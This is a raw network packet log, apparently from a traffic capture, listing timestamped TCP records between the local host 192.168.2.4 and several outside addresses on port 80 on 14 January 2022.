Jan 14, 2022 00:16:13.166795015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166893959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166990042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167104006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167192936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167287111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167382956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167480946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167572021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167844057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.167973995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.168090105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.168210983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.168895960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.169024944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.169117928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.181405067 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.181447983 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.181509018 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192456007 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192508936 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192549944 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192584038 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192586899 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192625999 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192641973 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192667961 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192704916 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192720890 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192744970 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192783117 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192786932 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192821026 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192858934 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192862988 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192897081 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192935944 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.192939043 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.192976952 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193017960 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193207026 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193247080 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193284035 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193294048 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193322897 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193362951 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193366051 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193399906 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193439960 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193440914 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193480015 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193516970 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193521976 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193556070 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193593979 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193604946 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193634033 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193675041 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193675995 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193711996 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193751097 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193762064 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193789959 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193826914 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193830967 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193895102 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193934917 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.193945885 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.193972111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194010973 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194015026 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194050074 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194087982 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194092035 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194125891 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194164991 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194170952 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194201946 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194241047 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194243908 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194278955 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194318056 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194319010 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194356918 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194394112 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194396973 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.194436073 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.194478989 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.252444983 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.252506971 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.252620935 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.253761053 CET	80	49912	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.256575108 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.256609917 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.256634951 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.256665945 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.256694078 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.263626099 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263667107 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263703108 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263742924 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263782024 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263787031 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.263818979 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263820887 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.263859034 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263884068 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.263896942 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263935089 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.263950109 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.263974905 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.264013052 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.264027119 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.264051914 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.264103889 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265136957 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265161037 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265178919 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265197039 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265214920 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265218019 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265237093 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265250921 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265254974 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265275002 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265291929 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265292883 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265311003 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265328884 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265332937 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265347958 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265366077 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265367031 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265384912 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265402079 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265402079 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265422106 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265439034 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265451908 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265455961 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265474081 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265506029 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265511990 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265532017 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265549898 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265566111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265583038 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265583992 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265624046 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265691996 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265712976 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265732050 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265749931 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265759945 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265782118 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265789032 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265836000 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265845060 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265881062 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265899897 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265917063 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265933990 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265934944 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.265954018 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.265973091 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.266007900 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.307306051 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.307357073 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.307382107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.307408094 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.307436943 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.307461023 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.323761940 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323807001 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323846102 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323885918 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323929071 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323945045 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.323966980 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.323982954 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.324008942 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.324043036 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.324060917 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.324100018 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.324126005 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.328607082 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.357925892 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.368705988 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.400609016 CET	80	49912	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.400706053 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.409364939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.409496069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.409576893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.409810066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410013914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410156012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410263062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410320997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410398960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410541058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410615921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410854101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.410944939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411034107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411138058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411201954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411294937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411384106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411540985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411675930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411766052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411845922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.411935091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412015915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412101030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412184000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412266970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412352085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412442923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412523985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412616968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412723064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412806034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412888050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.412974119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413052082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413140059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413222075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413304090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413388014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413472891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413556099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413646936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413731098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413815022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.413903952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.471671104 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.475212097 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.476150036 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.590468884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.590574980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.590823889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.590982914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.591104984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.591193914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.592386007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.592561007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.592681885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.592818022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.592881918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593000889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593096972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593183041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593267918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593357086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593456984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593570948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593725920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593832016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.593930960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594022036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594115019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594209909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594326019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594419956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594520092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594613075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594727039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594819069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.594913960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595009089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595108986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595199108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595288038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595374107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595459938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595573902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595691919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595738888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595825911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595920086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.595995903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596110106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596196890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596268892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596354008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596441984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596560001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596612930 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596637011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596662998 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596704006 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596740961 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596745014 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.596806049 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.596841097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596915007 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596935034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.596956968 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.596995115 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.597017050 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.597037077 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.597079992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.597095013 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.597105980 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.597146988 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.597201109 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.597256899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.597332954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.597419977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.597505093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.597593069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603044033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603195906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603339911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603467941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603598118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603739977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603862047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.603986025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604105949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604228020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604348898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604480982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604598999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604813099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.604943037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.615885973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.615988016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.616086960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.616190910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.616297007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.616405964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.623455048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623502016 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623542070 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623574018 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.623581886 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623621941 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.623661995 CET	80	49916	185.163.204.24	192.168.2.4
